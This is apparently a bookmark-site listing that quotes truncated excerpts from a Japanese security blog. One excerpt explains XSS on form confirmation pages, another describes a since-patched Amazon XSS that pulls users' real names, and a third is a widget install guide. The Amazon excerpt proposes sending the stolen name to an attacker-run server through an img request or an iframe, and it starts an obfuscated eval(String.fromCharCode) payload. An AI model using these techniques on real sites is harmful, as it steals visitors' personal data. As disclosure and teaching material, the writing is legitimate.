XSS - 表示系パラメータに存在する盲点 :: ぼくはまちちゃん!
こんにちはこんにちは!! クロスサイトスクリプティングの時間です! XSSというと…! まっさきに思いつくのが、入力データ送信 → 確認表示の部分での無害化漏れですよね! たとえばこんな感じのフォームから受け取ったパラメータを、 確認として表示するページとか! (入力) <form action="register.cgi" method="post"> タイトル:<input type="text" name="title"> ← 「ぼくはまちちゃん!」を入力 本文:<input type="text" name="body"> ← 「こんにちはこんにちは!!<script>alert(1)</script>」を入力 </form> (確認) <p>この内容で登録していい?</p> <p> タイトル: ぼくはまちちゃん!<br> 本文: こんにちはこんにちは!!<script>alert
本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん!
↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?本名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…! 本名吸い取り機のできあがり! こわいね>< リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ! (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9
きみのサイトに被はてブ数 :: ぼくはまちちゃん!
はてなブックマークおもしろいよね! ところで、ぼく、はてなブックマークで一番使うシンボル(?)って [B!] でも [↑B] でもなく [108 users] だと思うんだけど! だから自分のサイトで users が表示できるやつをつくってみたよ!! → ひてブ(js) v0.2 (ダウンロード) どんな感じかは、サンプルページをみてね! つかいかたはこうだよ! 1. まずは prototype.js をダウンロードして、自分のサイトに転送しておこうか! 2. そしてさっきの hihate_v01.zip の中の nuluerer.cgi を、きみのサイト上に置いてパーミッションの設定だ! chmod 755 nuluerer.cgi 3. つぎに使いたいページの <head> の中に以下のように記述してね! <script type="text/javascript" src="prot
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
